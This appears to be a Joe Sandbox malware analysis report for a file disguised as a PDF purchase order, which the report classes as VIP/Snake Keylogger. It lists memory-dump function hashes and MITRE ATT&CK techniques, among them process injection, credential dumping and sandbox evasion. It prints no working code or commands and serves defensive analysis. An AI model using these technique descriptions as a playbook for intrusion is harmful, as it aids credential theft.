Opcode ID: 13704d0c809a05035e24c5d54ede98898ffdee34f3d1e157b687b83316f9506b
Instruction ID: 87bc0749da5310b26629d75d11e80bebd51a0d8220ca02539c2b3cd1408db307
Opcode Fuzzy Hash: 13704d0c809a05035e24c5d54ede98898ffdee34f3d1e157b687b83316f9506b
Instruction Fuzzy Hash: 96319231645219DFCF069F64E854AAF7BB2EB48300F044416F9198F355CB39CE62DB91

Function 01472790 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73d3eb09cec16f678f6b5c18e64f93fc835f9eb037d01eee2431f82bc66b3b4
Instruction ID: 5df966f6b193139eba3330bbf9604bbcaa0566ef74e4dab51010364f51e2d071
Opcode Fuzzy Hash: a73d3eb09cec16f678f6b5c18e64f93fc835f9eb037d01eee2431f82bc66b3b4
Instruction Fuzzy Hash: D2316974D083498FCB01DFA9D9546EDBFB4FF4A300F0041AAD545AB265EB301A41CBA2

Function 01478380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41706ab17d120898bb4f7b316c05494f84ccd972922ea28c271fb9d62bb917cd
Instruction ID: bc33d415cbc663f53636fc5afd8f0b049e8ac14accca3f44a290e37d7f00f8fd
Opcode Fuzzy Hash: 41706ab17d120898bb4f7b316c05494f84ccd972922ea28c271fb9d62bb917cd
Instruction Fuzzy Hash: 8921B3303042138BDB155A698468BBF768BAFC4659F14843ED506CB7A6FAB6CC42E381

Function 014728F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924d65ec712f63ad69d3ec415acf9bc316a2fe3059e5db9dfc0c520da1cd68bc
Instruction ID: 2c4538ffe3d41079340276ce0286184c9bf00bdc210e1d8369682c64a7684f1f
Opcode Fuzzy Hash: 924d65ec712f63ad69d3ec415acf9bc316a2fe3059e5db9dfc0c520da1cd68bc
Instruction Fuzzy Hash: 94218EB5B00115AFCF15DB28C8409EF37A9EB992A0B14851ED8099B390DB72EE46CBD0

Function 00FED005 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3880358264.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_fed000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a18ae467e264b48bb4b66311c3d5494ee5df87ca8f855da761d779402cd6d1
Instruction ID: 834b162e335ccfa38dd2c9037b9186bb3114bffe592691d807530a959ab96216
Opcode Fuzzy Hash: 24a18ae467e264b48bb4b66311c3d5494ee5df87ca8f855da761d779402cd6d1
Instruction Fuzzy Hash: 1B312D7550E3C09FD703CB24C9A4701BF71AB47214F19C5EBD8898F6A7C22A980ACB62

Function 01476300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dba22cd1c35fd3345fde3740d1ff8eb3eb9603e1285ab4e240d5544ebb70cb
Instruction ID: 9f7ce42124a9300a47ca66cb47f7aaeb1dd59863c4ce12a7432acacf8de7f29c
Opcode Fuzzy Hash: 05dba22cd1c35fd3345fde3740d1ff8eb3eb9603e1285ab4e240d5544ebb70cb
Instruction Fuzzy Hash: 3921C035701A218FE7199B2AC46496FB7A7EF8A751705452AE906CB7A4CF31DC02CBC0

Function 00FED044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3880358264.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_fed000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd56583b0fe0ba223012f71cf812e6dcc26718fc824427ce31c4012f40e079e5
Instruction ID: 1a2599f36677cefe798d4002d3be429bc6d6ea3bb935e016ef7ec56240edae19
Opcode Fuzzy Hash: fd56583b0fe0ba223012f71cf812e6dcc26718fc824427ce31c4012f40e079e5
Instruction Fuzzy Hash: FD213472604384DFDB10DF20C9C4B26BB65FB84324F28C56DE9490B786C73AD846EB62

Function 01475649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b53e80fe7564f3695e2b62e905c4bd948aff9be1698c67634d1c34d839bd5b0
Instruction ID: e6ca45bf8f5dd00759c8a80e7dbe9766495ac5e110e7ccbe95a0eed0c2800676
Opcode Fuzzy Hash: 5b53e80fe7564f3695e2b62e905c4bd948aff9be1698c67634d1c34d839bd5b0
Instruction Fuzzy Hash: 7C213B316052588FCB059F68E454AEF3BB2EF45310F04446AF9498F355CB78CE62DB91

Function 01474285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4646b9747bb96e1d8329c4aa8e25beb484ffbbc814f81bf408ae9b9170d8de3b
Instruction ID: 474d2b214bf0b28f1093bde7a9e5f11e6c256ce2e85342879fb7021376ed32e7
Opcode Fuzzy Hash: 4646b9747bb96e1d8329c4aa8e25beb484ffbbc814f81bf408ae9b9170d8de3b
Instruction Fuzzy Hash: 6E317478E01319DFCB48DFA9E5948ADBBB2FF49305B208569E819AB364D731AD01CF50

Function 01479761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d1526f04b6dffd246067208a6fdae952797bca88b5a3febfb1e500e159bb633
Instruction ID: 61ddb7a2c96f6c6221ec590b1c013ae692e93731c854f3b4e2e3f550c74d3ae5
Opcode Fuzzy Hash: 7d1526f04b6dffd246067208a6fdae952797bca88b5a3febfb1e500e159bb633
Instruction Fuzzy Hash: 69218B30E01248DFDB09CFA5D550AEEBFB6AF49315F24805AE501E73A0DB30D941DB20

Function 014762F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d59b6f0346b4ffc1c6a17e40e6f13e5efb18c4452868a30eab53b080d7af3e
Instruction ID: 32e22c62a8739856f325762a310d09c3b9e76ae80da50660aab78f83773ba280
Opcode Fuzzy Hash: 78d59b6f0346b4ffc1c6a17e40e6f13e5efb18c4452868a30eab53b080d7af3e
Instruction Fuzzy Hash: 6D11A331745A118FE7165B2ED46496E7BA3AFC975131944ABE906CB7A0CF31CC02CB90

Function 0147F640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e1e6512949866b6679eeaf02fb5796f86a3d2a03143a1c87b8650773bd622f4
Instruction ID: 024906cb943cad9ce6fecaf95c48af62072ee3143f87b8ec87d7245ea248e74f
Opcode Fuzzy Hash: 4e1e6512949866b6679eeaf02fb5796f86a3d2a03143a1c87b8650773bd622f4
Instruction Fuzzy Hash: 41213BB0D003199FEB05EFA9D84079EBBB2FB84301F1085AAD558AB365EB705A059F91

Function 014727F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc750c0a3485a5d841d74c502223542e12db8bf04b1a34637576ba063333a881
Instruction ID: fad47bdce8290ced1d64bdf939e937b7d3a71850aa60b7b456e60d8bbef54538
Opcode Fuzzy Hash: cc750c0a3485a5d841d74c502223542e12db8bf04b1a34637576ba063333a881
Instruction Fuzzy Hash: 5621C274C0520A8FCB00EFA9D9549EEBFF4FF4A300F10566AD905B7224EB315A95CBA5

Function 0147F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb283225965939fcd635d4c3771dd8badf1a01c6d7e554bc0a502073f16a58f
Instruction ID: b77040ec84b666b18480717aaf41be558db388b06f06285fbb197549550048de
Opcode Fuzzy Hash: efb283225965939fcd635d4c3771dd8badf1a01c6d7e554bc0a502073f16a58f
Instruction Fuzzy Hash: E8110D70D0031D9FDB44EFA9D95079EBBF2FB84301F1086AAD118AB365EB705A059F81

Function 01475E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a71dbd5039dcd630aa92a96bd24f99a77e49fd50efe70a74f2b2f2e3633ed523
Instruction ID: 2883ab29e775bf759df44f049995eafd5d41952336b56c65fe6c8aa7776e9c85
Opcode Fuzzy Hash: a71dbd5039dcd630aa92a96bd24f99a77e49fd50efe70a74f2b2f2e3633ed523
Instruction Fuzzy Hash: EB01F132A042186FCB019F589C10AAF3BA7EFD9350B08805BFA05CF390CE758D13A791

Function 0147E8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b009b5754e75595b6863c6d527ea0b1fb5cb7f9507ecd440932eafdc23538d
Instruction ID: f9030a7b06e34a025e99a95bcdc46bcba7aa0604bf9c07883e8f3c679dd3f569
Opcode Fuzzy Hash: e0b009b5754e75595b6863c6d527ea0b1fb5cb7f9507ecd440932eafdc23538d
Instruction Fuzzy Hash: 2D116D74D0434AEFCB01DFA9D8446AEBBB1FF49300F004569D910A7355D7306A15DF91

Function 0147ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072071835e8e29cd18b99011250625e29609fd4688a8724eecf10ef872724770
Instruction ID: 0d1828f3e45b35bac194d810fae74e0feac10328b694fbf79c7dc291288568e9
Opcode Fuzzy Hash: 072071835e8e29cd18b99011250625e29609fd4688a8724eecf10ef872724770
Instruction Fuzzy Hash: 3BF0F6317006105F97265A2E9454AAFBBDEEFC8A6532D447BEA06C7371EE31CC038380

Function 01479D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d6b9f11b61797164b88c7bf0082de66fc53aedf16ac317d52c6598123c5fd2
Instruction ID: 8d007f647f8a5597fd59e6c3cbae60bc4aa3f4cf0fea3585316dcfdd2313afb8
Opcode Fuzzy Hash: 40d6b9f11b61797164b88c7bf0082de66fc53aedf16ac317d52c6598123c5fd2
Instruction Fuzzy Hash: D0F04935300215AFD7086AA6D8509BB7BDBEFDC271B148429BA4AC7350DE71CC5193E0

Function 01479C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb46e023d10356c0a45c19323b2a2a3e8dc2d348dea4925876609751e7adcac
Instruction ID: 98166ffd6a9d173f16884b3fe80a5be5ccf0a7f73a4c31847eecc6da3aa169da
Opcode Fuzzy Hash: 0bb46e023d10356c0a45c19323b2a2a3e8dc2d348dea4925876609751e7adcac
Instruction Fuzzy Hash: FCF090319041989FCB019F69D848AEABFB1EF8E330F0485A7E558C7262D6314A56CB91

Function 0147F5C0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5d5aab42fc0d36e25d4c636da41822169641d4bf341db8530159b344c4ae95
Instruction ID: b20dc3ebd5f837ed196402f6df248eeee9787a02b30784d323af25ff2cdd17ec
Opcode Fuzzy Hash: 6f5d5aab42fc0d36e25d4c636da41822169641d4bf341db8530159b344c4ae95
Instruction Fuzzy Hash: F3F03A70A11225CFCB84EF7CC404AAE77F4AF0861172144AAD819DB321EB31DD058BD0

Function 014728A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444cd206396367217e697a8f3efa0f84905af61d1a87f2b2f97b5ab625e87dc3
Instruction ID: 72e0bf19696bc3e33d64711fafe5199e3fde9c937a9453854aa37448abdc7960
Opcode Fuzzy Hash: 444cd206396367217e697a8f3efa0f84905af61d1a87f2b2f97b5ab625e87dc3
Instruction Fuzzy Hash: A6E02031D54356CAC701D7F09C040EEBB34ADD6111748459BC061370A1EB30161AC361

Function 01476739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ad8dacb2d11897a5c67d44d4203609f819ff4ec5d79cf20b7bf27e7fe32845
Instruction ID: 7b4974618c4ca9e6cc263a629d0240221bc8dcb176f3b98b9c2f6c69df7f1e7f
Opcode Fuzzy Hash: e2ad8dacb2d11897a5c67d44d4203609f819ff4ec5d79cf20b7bf27e7fe32845
Instruction Fuzzy Hash: F5E0C23000836A4FC743AFB9EC04408BB3AFF832047449AA2D1044E24BDFB82945C762

Function 014728B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83ec8f42b0743f05a58d3bef2e685022d64108828db4c6605ff216528e1f5bf
Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
Opcode Fuzzy Hash: d83ec8f42b0743f05a58d3bef2e685022d64108828db4c6605ff216528e1f5bf
Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1

Function 0147D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24453bf4c11ae04e2c3ce2f0ad2cf7959db2a4dfa787f558224847619ad46c8d
Instruction ID: c04a05beea8d3f5a9f799801089edeff5dc1b38eb917e15a77f64958d65bd434
Opcode Fuzzy Hash: 24453bf4c11ae04e2c3ce2f0ad2cf7959db2a4dfa787f558224847619ad46c8d
Instruction Fuzzy Hash: 8AD04235E45109CBCB20DFA8E4888DCFB71EF89222F10552AD929A3251D6305865CF11

Function 0147AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6197e7e678b81fa091b6bfc8db67d7a0b8d17ca834b15160b021810098c5280b
Instruction ID: 87085a67260a16e50a524b04b3f4fd0d3e0de91167ba1a509624fd4fdc7cac55
Opcode Fuzzy Hash: 6197e7e678b81fa091b6bfc8db67d7a0b8d17ca834b15160b021810098c5280b
Instruction Fuzzy Hash: ACD0673AB400089FCF049F99E840DDDF776FB98221B048517E916A3260C6319925DB60

Function 01476748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a797cb0ec59001959d7088ad813cc591ea971e924f8fb320a0d914756e79a5e4
Instruction ID: 74c6f583b32f2fa12efe83021d6b3949990892c63a0dffea8af630a9ae776bd8
Opcode Fuzzy Hash: a797cb0ec59001959d7088ad813cc591ea971e924f8fb320a0d914756e79a5e4
Instruction Fuzzy Hash: 6FC012304443294FDB45FB66FC45915372AB7C0505780AB11A5050A74EDFB82A455B96

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

